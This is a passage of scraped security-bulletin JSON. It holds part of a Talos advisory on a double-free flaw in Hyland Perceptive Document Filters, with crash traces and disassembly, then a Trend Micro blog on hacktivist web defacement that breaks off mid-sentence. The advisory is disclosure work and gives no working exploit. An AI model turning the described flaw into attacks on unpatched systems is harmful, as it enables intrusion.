ISYS_NS::CGdiCanvasImpl::~CGdiCanvasImpl () from ./libISYSreadershd.so\n #1 0xf51e89e9 in ?? () from ./libISYSreadershd.so\n #2 0xf4b4b028 in ?? () from ./libISYSreadershd.so\n #3 0xf51d9b1f in ISYS_NS::CGdiCanvas::~CGdiCanvas() () from ./libISYSreadershd.so\n #4 0xf51e8829 in ?? () from ./libISYSreadershd.so\n #5 0xf51f01e8 in ISYS_NS::CGdiBitmapImpl::~CGdiBitmapImpl() () from ./libISYSreadershd.so\n #6 0xf51e88e9 in ?? () from ./libISYSreadershd.so\n #7 0xf51db388 in ?? ISYS_NS::CGdiBitmap::~CGdiBitmap() from ./libISYSreadershd.so\n #8 0xf5227233 in ?? () from ./libISYSreadershd.so\n #9 0xf50b3221 in ?? () from ./libISYSreadershd.so\n #10 0xf522172d in ?? () from ./libISYSreadershd.so\n #11 0xf51a621f in ?? () from ./libISYSreadershd.so\n #12 0xf518a8bd in ?? () from ./libISYSreadershd.so\n #13 0xf591c6c3 in ?? () from ./libISYSreaders.so\n #14 0xf7ef4c28 in IGR_Close_Canvas () from ./libISYS11df.so\n #15 0x0805bda0 in ?? ()\n #16 0x08061690 in ?? ()\n #17 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #18 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #19 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #20 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #21 0x08054e88 in ?? ()\n #22 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #23 0x080531b1 in ?? ()\n \n\nTracking this object\u2019s life cycle we can see its creation inside `ISYS_NS::CGdiCanvasImpl::CGdiCanvasImpl` method:\n \n \n Object allocation call stack\n \n #0 0xf51f0977 in ISYS_NS::CGdiCanvasImpl () from ./libISYSreadershd.so\n #1 0xf51e65d0 in ?? () from ./libISYSreadershd.so\n #2 0xf5229bf4 in ?? () from ./libISYSreadershd.so\n #3 0xf50b9f46 in ?? () from ./libISYSreadershd.so\n #4 0xf50b3539 in ?? () from ./libISYSreadershd.so\n #5 0xf5196e5d in ?? () from ./libISYSreadershd.so\n #6 0xf591c595 in ?? () from ./libISYSreaders.so\n #7 0xf7ef4bda in IGR_Render_Page () from ./libISYS11df.so\n #8 0x0805bbd8 in ?? ()\n #9 0x08061690 in ?? ()\n #10 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #11 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #12 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #13 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #14 0x08054e88 in ?? ()\n #15 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #16 0x080531b1 in ?? ()\n \n \n \n .text:F51F095C push 0FCh ; unsigned int\n .text:F51F0961 call operator new(uint)\n .text:F51F0966 mov esi, eax\n .text:F51F0968 pop ecx\n .text:F51F0969 pop eax\n .text:F51F096A push edi ; SkBitmap *\n .text:F51F096B push esi ; this\n .text:F51F096C call SkCanvas::SkCanvas(SkBitmap const&)\n .text:F51F0971 add esp, 10h\n .text:F51F0974 mov edx, [ebp+arg_0]\n .text:F51F0977 mov [edx+8], esi\n \n\nFurther inside the `sub_F511F5F0` function we can observe a call at address `F511FCE3` to `SkCanvas::~SkCanvas` virtual destructor which deallocates the vulnerable object:\n \n \n sub_F511F5F0\n (...)\n .text:F511FCD7 sub esp, 0Ch\n .text:F511FCDA mov edx, [ebp+var_164]\n .text:F511FCE0 mov eax, [edx]\n .text:F511FCE2 push edx\n .text:F511FCE3 call dword ptr [eax+4] ; SkCanvas::~SkCanvas\n .text:F511FCE6 add esp, 10h\n \n \n Call stack for dealocation\n \n #0 0xf46f6bed in SkCanvas::~SkCanvas() () from ./libISYSgraphics.so\n #1 0xf511fce6 in ?? () from ./libISYSreadershd.so\n #2 0xf5083569 in ?? () from ./libISYSreadershd.so\n #3 0xf50832e4 in ?? () from ./libISYSreadershd.so\n #4 0xf508331d in ?? () from ./libISYSreadershd.so\n #5 0xf50833bb in ?? () from ./libISYSreadershd.so\n #6 0xf5224987 in ?? () from ./libISYSreadershd.so\n #7 0xf50b4af7 in ?? () from ./libISYSreadershd.so\n #8 0xf50b4cdd in ?? () from ./libISYSreadershd.so\n #9 0xf50ba2d1 in ?? () from ./libISYSreadershd.so\n #10 0xf50b3539 in ?? () from ./libISYSreadershd.so\n #11 0xf5196e5d in ?? () from ./libISYSreadershd.so\n #12 0xf591c595 in ?? () from ./libISYSreaders.so\n #13 0xf7ef4bda in IGR_Render_Page () from ./libISYS11df.so\n #14 0x0805bbd8 in ?? ()\n #15 0x08061690 in ?? ()\n #16 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #17 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #18 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #19 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #20 0x08054e88 in ?? ()\n #21 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #22 0x080531b1 in ?? ()\n \n\nNext, during destruction of `ISYS_NS::CGdiCanvasImpl::~CGdiCanvasImpl` object a call to `SkCanvas::~SkCanvas` virtual destructor is made again:\n \n \n .text:F51F0690 ISYS_NS::CGdiCanvasImpl::~CGdiCanvasImpl() proc near\n .text:F51F0690 \n (...)\n .text:F51F06BA sub esp, 0Ch\n .text:F51F06BD mov eax, [edx]\n .text:F51F06BF push edx\n .text:F51F06C0 call dword ptr [eax+4] ; SkCanvas::~SkCanvas()\n .text:F51F06C3 add esp, 10h\n \n \n Call stack for second free\n #0 0xf51f06c0 in ?? () from ./libISYSreadershd.so\n #1 0xf51e89e9 in ?? () from ./libISYSreadershd.so\n #2 0xf4b4b028 in ?? () from ./libISYSreadershd.so\n #3 0xf51d9b1f in ?? () from ./libISYSreadershd.so\n #4 0xf51e8829 in ?? () from ./libISYSreadershd.so\n #5 0xf51f01e8 in ?? () from ./libISYSreadershd.so\n #6 0xf51e88e9 in ?? () from ./libISYSreadershd.so\n #7 0xf51db388 in ?? () from ./libISYSreadershd.so\n #8 0xf5227233 in ?? () from ./libISYSreadershd.so\n #9 0xf50b3221 in ?? () from ./libISYSreadershd.so\n #10 0xf522172d in ?? () from ./libISYSreadershd.so\n #11 0xf51a621f in ?? () from ./libISYSreadershd.so\n #12 0xf518a8bd in ?? () from ./libISYSreadershd.so\n #13 0xf591c6c3 in ?? () from ./libISYSreaders.so\n #14 0xf7ef4c28 in IGR_Close_Canvas () from ./libISYS11df.so\n #15 0x0805bda0 in ?? ()\n #16 0x08061690 in ?? ()\n #17 0x08068c27 in main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) ()\n #18 0xf613173d in ISYS_NS::CISYScommander::CTool::execute(ISYS_NS::CISYScommander::CResult*) const () from ./libISYSshared.so\n #19 0xf613dff9 in bool ISYS_NS::CISYScommander::execute<char>(int, char**) () from ./libISYSshared.so\n #20 0xf613a524 in ISYS_NS::CISYScommander::execute(int, char**) () from ./libISYSshared.so\n #21 0x08054e88 in ?? ()\n #22 0xf5aab637 in __libc_start_main (main=0x8054d40, argc=0x5, argv=0xffa201e4, init=0x807ebd0, fini=0x807ebc0, rtld_fini=0xf7f3d880 <_dl_fini>, stack_end=0xffa201dc) at ../csu/libc-start.c:291\n #23 0x080531b1 in ?? () \n \n\nresulting in the double free of `SkCanvas` object. An attacker who properly manipulates the heap state between the object's first deallocation and its second deallocation can easily turn this double free vulnerability into arbitrary code execution.\n\n### Crash Information\n \n \n ==6702== Command: ./isys_doc2text --jpg -o /tmp ./storage/7afffeb388f9aebf11226b95328be2f7\n ==6702== \n [1] File type: Open Document Format (76); Capabilities: 7 - ./storage/7afffeb388f9aebf11226b95328be2f7\n [00000000] IGR_RENDER_PAGE failed on ./storage/7afffeb388f9aebf11226b95328be2f7 with code 4 [Could not read ZIP file entry]\n ==6702== Invalid read of size 4\n ==6702== at 0x78956BD: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D9E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x71F0027: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x787EB1E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D828: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78951E7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D8E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7880387: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CC232: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758220: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C672C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x784B21E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Address 0x6c69890 is 0 bytes inside a block of size 252 free'd\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D49BF4: SkCanvas::~SkCanvas() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x77C4CE5: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7728568: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77282E3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x772831C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77283BA: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C9986: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759AF6: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759CDC: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775F2D0: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Block was alloc'd at\n ==6702== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x7895965: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788B5CF: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CEBF3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775EF45: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x783BE5C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x67BE594: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreaders.so)\n ==6702== by 0x403CBD9: IGR_Render_Page (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYS11df.so)\n ==6702== by 0x805BBD7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x806168F: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x8068C26: main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== \n ==6702== Invalid write of size 4\n ==6702== at 0x8D2A02F: SkRefCntBase::~SkRefCntBase() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x78956C2: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D9E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x71F0027: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x787EB1E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D828: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78951E7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D8E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7880387: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CC232: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758220: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C672C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Address 0x6c69890 is 0 bytes inside a block of size 252 free'd\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D49BF4: SkCanvas::~SkCanvas() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x77C4CE5: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7728568: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77282E3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x772831C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77283BA: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C9986: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759AF6: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759CDC: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775F2D0: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Block was alloc'd at\n ==6702== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x7895965: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788B5CF: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CEBF3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775EF45: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x783BE5C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x67BE594: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreaders.so)\n ==6702== by 0x403CBD9: IGR_Render_Page (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYS11df.so)\n ==6702== by 0x805BBD7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x806168F: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x8068C26: main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== \n ==6702== Invalid free() / delete / delete[] / realloc()\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D2A036: SkRefCntBase::~SkRefCntBase() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x78956C2: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D9E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x71F0027: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x787EB1E: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D828: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78951E7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788D8E8: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7880387: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CC232: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758220: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Address 0x6c69890 is 0 bytes inside a block of size 252 free'd\n ==6702== at 0x402D7B8: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x8D49BF4: SkCanvas::~SkCanvas() (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSgraphics.so)\n ==6702== by 0x77C4CE5: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7728568: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77282E3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x772831C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x77283BA: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78C9986: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759AF6: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7759CDC: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775F2D0: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== Block was alloc'd at\n ==6702== at 0x402C6BC: operator new(unsigned int) (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)\n ==6702== by 0x7895965: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x788B5CF: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x78CEBF3: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x775EF45: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x7758538: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x783BE5C: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreadershd.so)\n ==6702== by 0x67BE594: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYSreaders.so)\n ==6702== by 0x403CBD9: IGR_Render_Page (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/libISYS11df.so)\n ==6702== by 0x805BBD7: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x806168F: ??? (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== by 0x8068C26: main_doc2text(ISYS_NS::CISYScommander::CResult*, void*) (in /home/icewall/bugs/Perceptive_11.4.2647/bin/linux/intel-32/isys_doc2text)\n ==6702== \n [1] Returned 3 page(s)\n ==6702== \n ==6702== HEAP SUMMARY:\n ==6702== in use at exit: 21,065 bytes in 12 blocks\n ==6702== total heap usage: 64,861 allocs, 64,850 frees, 42,305,231 bytes allocated\n ==6702== \n ==6702== LEAK SUMMARY:\n ==6702== definitely lost: 0 bytes in 0 blocks\n ==6702== indirectly lost: 0 bytes in 0 blocks\n ==6702== possibly lost: 0 bytes in 0 blocks\n ==6702== still reachable: 21,065 bytes in 12 blocks\n ==6702== suppressed: 0 bytes in 0 blocks\n ==6702== Rerun with --leak-check=full to see details of leaked memory\n ==6702== \n ==6702== For counts of detected and suppressed errors, rerun with: -v\n ==6702== ERROR SUMMARY: 3 errors from 3 contexts (suppressed: 0 from 0)\n \n\n### Timeline\n\n2018-02-22 - Vendor Disclosure \n2018-03-22 - Vendor patched \n2018-04-26 - Public Release\n\n##### Credit\n\nDiscovered by Marcin 'Icewall' Noga of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0534\n\nPrevious Report\n\nTALOS-2018-0527\n", "edition": 1, "reporter": "Talos Intelligence", "published": "2018-04-26T00:00:00", "title": "Hyland Perceptive Document Filters OpenDocument to JPEG conversion SkCanvas Code Execution vulnerability", "type": "talos", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-3845"], "modified": "2018-04-26T00:00:00", "id": "TALOS-2018-0528", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0528", "cvss": {"score": 0.0, "vector": "NONE"}}], "trendmicroblog": [{"lastseen": "2018-04-26T16:41:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "\n\nActivists have been featured more frequently in the news lately, with marches shining the spotlight on women's rights and bringing about an end to gun violence, to name a few. However, the real world isn't the only place where activism happens.\n\nThe digital realm has become a critical space for individuals to express their opinions and further their causes. While this can revolve around an informational website or video streaming platform, activism has also taken hold in the world of cybercriminals and hackers who have their own beliefs they'd like to communicate and publicize.\n\nEnter hacktivism, activities motivated by political or other ideas spurred by hackers. In many cases, these individuals aren't marching with colorful signs or presenting their ideas as part of civil discourse, but are taking advantage of weaknesses to splash their ideas on an array of different, legitimate websites.\n\n### Local Ohio websites defaced by hacktivists\n\nBefore we delve into the statistics and methods behind these instances, let's take a look at a recent example.\n\nIn 2017, the websites belonging to several local Ohio organizations - including those of Governor John Kasich and his wife Karen Kasich - were hacked and defaced on a Sunday morning. According to a report from Cyberscoop, this even was [not an isolated incident](<https://www.cyberscoop.com/ohio-websites-hacked-isis-john-kasich/>), and that local government sites in Maryland, Idaho, California and New York had also been defaced by hackers in the past.\n\nThe hacktivists breached the governor's and other local entities' websites, and replaced the original, legitimate content with a threat against the current presidential administration and other violent messages, accompanied by a logo belonging to hacking group Team System DZ.\n\nAs Cyberscoop reported, this instance and many others like it wherein attackers vandalize platforms, are considered \"a lower-level form of cyberattack,\" and typically come at the hands of less experienced hackers.\n\nThis group, Team System DZ, took credit for the defacement on the websites themselves as well as on Facebook, and has been vandalizing websites in this way for several years now.\n\nWebsite defacement is a form of digital graffiti.\n\n### How defacement happens\n\nAlthough hacktivist website defacement has been taking place for years now - and has even been featured as part of pop culture story lines in sitcoms and film - before recently, there wasn't much research that delved into the targets, methods and motivations behind these activities.\n\nTrend Micro researchers leveraged machine learning and other tactics to gather, examine and analyze more than 13 million instances of web defacements taking place over 18 years across the globe. The insights are compiled in the report, \"[A Deep Dive into Web Defacement: How Geopolitical Events Trigger Web Attacks](<https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf>).\"\n\nThe report shows a startling and rising trend toward web defacement, using data from sources including dedicated hacktivist reporting sites Zone-H, Hack-CN, Mirror Zone, Hack Mirror and MyDeface. Overall, Trend Micro found more than 104,000 unique defacers, which impacted over 9.929 million individual, compromised domains.\n\n\n\nMost of these events involved defaced websites supported by the Linux operating system, which accounted for more than 9 million defacements. Windows 2003 saw more than 1.5 million defacements, with over 400,000 and 338,000 taking place on Windows 2000 and Windows 2008, respectively. Similarly, Apache servers saw the brunt of attacks, with more than 8 million defacement instances, and more than 1.5 million hacktivist attacks took place on IIS/6.0 web servers.\n\nIn order to breach website protections and carry out defacement, hacktivists will target specific vulnerabilities to glean unauthorized access to backend supporting systems. Trend Micro found that most hacktivists (more than 2 million) leveraged file inclusion vulnerabilities to enable defacement. Other strategies included:\n\n * SQL injections - 1.26 million\n * Unpatched system vulnerabilities - 1.16 million\n * Password stealing - 1.11 million\n * Other types of server intrusions - 800,000\n\n### Motivations driving defacement attacks\n\nThere are numerous different aspects that can motivate hacktivists to deface a website. In many instances, the target is chosen specifically and the defacement tailored to express a certain viewpoint.\n\nTrend Micro's research found that many defacement episodes took place as reactions to other events. Many instances served to push an agenda held by the hacking group, to shine a light on grievances and to spread certain political messages.\n\n**#OpIsrael** \nThis is one of the first, and longest running web defacement campaigns, and one of three major anti-Israel campaigns identified by Trend Micro researchers. #OpIsrael is one example of hacktivist activity motivated by political beliefs and shared grievances. To date, several different hacking groups have taken part in #OpIsrael, with defacements driven by the Israel - Palestine conflict.\n\nOne of the first instances of defacements as part of this campaign took place in 2012, when the regular content of myisrael.us was removed and replaced with a political message that included the phrase \"Freedom For Palestine\" alongside an embedded video condemning the Gaza War.\n\nSince then, the campaign has carried out an annual large-scale defacement of various websites on April 7, which coincides with Holocaust Remembrance Day - to date, more than 300 defacers have vandalized over 5,400 domains.\n\nWebsite defacement at the hands of hacktivists has impacted government agencies, private organizations and other entities.\n\n**#OpFrance: Hacktivists respond to Charlie Hebdo attack** \nSeveral hacktivist defacement campaigns also came on the heels of the Charlie Hebdo attack in January 2015, revolving around a controversial French magazine that published satirical cartoons about Islam and the prophet Muhammad.\n\nCampaigns including #OpFrance were established in response to the 